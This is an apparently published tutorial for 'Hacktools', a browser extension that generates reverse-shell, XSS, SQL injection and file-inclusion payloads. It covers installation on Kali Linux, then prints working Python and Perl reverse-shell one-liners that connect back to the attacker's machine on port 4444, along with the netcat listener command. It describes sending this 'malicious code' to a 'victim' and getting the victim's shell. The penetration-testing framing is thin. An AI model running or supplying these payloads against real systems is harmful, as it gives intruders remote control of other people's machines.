No Longer Need To Search For Payloads on Different Websites


Now there is no need to search for payloads on different websites. Here is the tool which has all in one place, you just have to enter the target IP address to generate the following payloads:

  • Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)
  • Shell Spawning (TTY Shell Spawning)
  • XSS Payloads
  • Basic SQLi payloads
  • Local file inclusion payloads (LFI)
  • Base64 Encoder / Decoder
  • Hash Generator (MD5, SHA1, SHA256, SHA512)
  • Useful Linux commands (Port Forwarding, SUID)

It works like web extension that makes it easier for every penetration tester for testing any target machine.


  • OS: Kali Linux 2020
  • Kernel version: 5.6.0

Installation Steps

  • It has two different extensions chrome and firefox, download the required one. Here, we have download the chrome one.  
root@kali:/home/iicybersecurity# wget
--2020-08-27 11:12:33--
Resolving (
Connecting to (||:443... connected.
Saving to: ‘’                    100%[=====================================================================================================>] 386.89K   328KB/s    in 1.2s
2020-08-27 11:12:51 (328 KB/s) - ‘’ saved [396180/396180]
  • Next, use this command to extract the zip file. “Unzip <file name>”
root@kali:/home/iicybersecurity# unzip
   creating: dist/
  inflating: dist/app.bundle.js
  inflating: dist/devtools.html
  inflating: dist/devtools.js
  inflating: dist/get_started128.png
 extracting: dist/get_started16.png
 extracting: dist/get_started32.png
 extracting: dist/get_started48.png
  inflating: dist/iconfont.js
  inflating: dist/index.html
  inflating: dist/manifest.json
  • Successfully extracted the file.
  • Use cd command to enter into dist directory.
root@kali:/home/iicybersecurity# cd dist/
  • Next, we have to add the file extension in the chrome browser. Follow these steps to add.
    • Chrome Browser -> settings -> Extensions Tab -> Turn on developer mode -> Load upacked -> select the dist directory
Hacktools - Adding extension
Hacktools – Adding extension
  • Now, open index.html file
Hacktools - HTML File
Hacktools – HTML File
  • Successfully open the hack tool.
  • Here, we see the different reverse shell payloads available on screen.
  • We have to enter the IP address & port number to generate payload.
  • Here, we have entered the hacker’s machine <IP address:4444>.
  • Simply copy the payloads and send to the victim’s machine but before running the command on the victim’s machine, we have to run this command on hacker machine to listen to reverse connection.
    • “nc -l -p 4444”
  • Here, we have copied python malicious shellcode and send to the victim machine.
  • Run the following python payload on the victim’s machine.
export RHOST="";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[ fd in (0,1,2)];pty.spawn("/bin/sh")'
  • If the victim executes this malicious code on his machine, hacker will get the victim’s shell.
Hacktools - Victim's Shell
Hacktools – Victim’s Shell
  • Successfully we got the victim’s shell.

 Perl Reverse Shell.

  • Use this command on hacker machine to get the victim’s shell.
    • nc -l -p 4444
  • Here, we have executed the Perl reverse shellcode.
perl -e 'use Socket;$i="$ENV{}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • If victim executes the shell code, hacker will get the shell.
Hacktools - Victim's Shell
Hacktools – Victim’s Shell
  • Successfully we got the shell.

Hash Functions

We also have a hash generator. This MD5 hash function, we can also choose different hash by clicking on down arrow button and choose the required one.

Hacktools - Hash Function
Hacktools – Hash Function
  • Successfully hash generated.


As we saw all the required information which any penetration tester needs are all in one place and how easily we exploited the victim’s machine by simply copying & running the malicious code.